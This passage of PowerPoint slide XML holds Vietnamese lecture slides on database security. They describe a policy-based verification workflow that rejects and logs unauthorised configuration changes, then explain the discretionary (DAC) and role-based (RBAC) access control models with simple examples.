            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ây dựng các chính sách để hỗ trợ các mục tiêu nhất định. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Các chính sách này được lưu trữ trong cùng một cơ sở dữ liệu đang được bảo vệ (cơ sở dữ liệu tar-get) và được sử dụng để xác minh các yêu cầu (hoặc nỗ lực) thay đổi cấu hình cơ sở dữ liệu và thực thi các nhiệm vụ chính trị. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>- (Bước 2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Khi tin tặc bắt đầu nỗ lực thay đổi cấu hình bảo mật.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>- (Bước 3 &amp;; 4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Thực hiện quá trình xác minh trước khi có thể được xử lý. Bước này được thực hiện bởi các thủ tục lưu trữ cơ sở dữ liệu có logic tích hợp để</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>- (Bước 5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kiểm tra yêu cầu đối với các chính sách. Nếu yêu cầu tuân thủ các chính sách, thì yêu cầu sẽ được áp dụng.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Sau đó, các bảng/dạng xem hệ thống cơ sở dữ liệu được cập nhật để phản ánh sự thay đổi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(bước 6) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>và biên bản kiểm tra được ghi lại </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(bước 7). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>- (Bước 8) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nếu không, nhiệm vụ lại sẽ bị từ chối và chủ sở hữu hệ thống được cảnh báo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>- (Bước 9) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Người dùng được thông báo </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>- (Bước 10) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ấu vết kiểm tra được ghi lại</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160063784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C011F023-F498-3E72-FD99-7B867BDDC8AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="742951" y="2698265"/>
            <a:ext cx="16802100" cy="7460324"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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24661D22-8A37-F4F0-B13C-998CDB4C8866}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="2915208"/>
            <a:ext cx="6096000"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xmlns="" id="{4A0FB8ED-4AC2-20E6-D0A3-D932529EFC15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11158728" y="3577107"/>
            <a:ext cx="5811975" cy="5429416"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{3F5EB685-3F5B-B05F-6BF0-B20A1DD4F6DA}"/>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E55106E-8D15-8AA4-AB8D-51AD76DF887E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1317297" y="4322339"/>
            <a:ext cx="9841431" cy="3400931"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ho phép cấp hoặc hạn chế quyền truy cập đối tượng thông qua chính sách truy cập được xác định bởi nhóm chủ sở hữu hoặc chủ thể của đối tượng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> thiết lập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ví </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>dụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Một </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>báo cáo nhỏ về dự án cụ thể có thể có </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>chủ sở hữu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>là </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>trưởng nhóm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>dự án. Anh ta có thể quyết định chia sẻ tài liệu này với các thành viên khác trong nhóm, nhưng không chia sẻ nó cho những người không liên quan đến dự án.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{FA58F7D7-A8AF-35C4-612C-DBFB0C289413}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8436780" y="9639300"/>
            <a:ext cx="707220" cy="30479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11</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3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{5FBE3A8C-BA07-A9F6-65AF-E5FB34B21D47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13489222" y="9439245"/>
            <a:ext cx="1794103" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Mô hình DAC</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19585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0758C992-63F2-5CB2-2D16-5542F6DFE385}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="742951" y="2698265"/>
            <a:ext cx="16802100" cy="7460324"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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0CF63C84-6065-4E25-EE81-C6D2DF3257ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="2915208"/>
            <a:ext cx="9863328" cy="646331"/>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600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="36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xmlns="" id="{B55063CD-77BA-8588-09BD-946DFC7AE468}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="357710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1AF021CE-3302-DDDA-2CAA-4C4DA180DF27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1305534" y="4146673"/>
            <a:ext cx="10505466" cy="3616375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Trong hệ thống </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cơ sở dữ liệu, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>người dùng chỉ có thể truy cập vào các đối tượng khi được cấp quyền bởi người quản trị viên:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" i="0">
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="è"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ví dụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Vai trò "Người quản trị hệ thống" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>có quyền truy cập vào tất cả các bảng dữ liệu, thực hiện các hoạt động như </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>thêm, sửa, xóa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>cơ sở dữ liệu và quản lý tài khoản người dùng. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Vai trò "Khách hàng" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>chỉ có quyền truy cập vào dữ liệu cá nhân của họ, như lịch sử giao dịch và thông tin tài khoản.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{8DB54FED-40B8-585D-FFEF-D823DFF1E493}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1197030" y="7937126"/>
            <a:ext cx="10648947" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">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Thể hiện sự </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>phân chia rõ ràng về vai trò và quyền hạn, giúp tăng cường an ninh và tuân thủ quy trình trong tổ chức.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{18C98644-6A5F-B4F5-368A-941152366491}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12065036" y="3390900"/>
            <a:ext cx="5193027" cy="5833593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{F7FA2628-9B82-180D-DDF3-3E02211F62EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8033279" y="9809032"/>
            <a:ext cx="65352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12</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3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{5FFABD1B-7FEB-A46D-4890-4705755E44BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14116247" y="9683814"/>
            <a:ext cx="2186739" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Mô hình RBAC</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6324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xmlns=""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8E4242AE-E8EA-82B1-F124-DE6DC72B53C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1244828" y="2654163"/>
            <a:ext cx="9863328"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4 </a:t>
            </a:r>
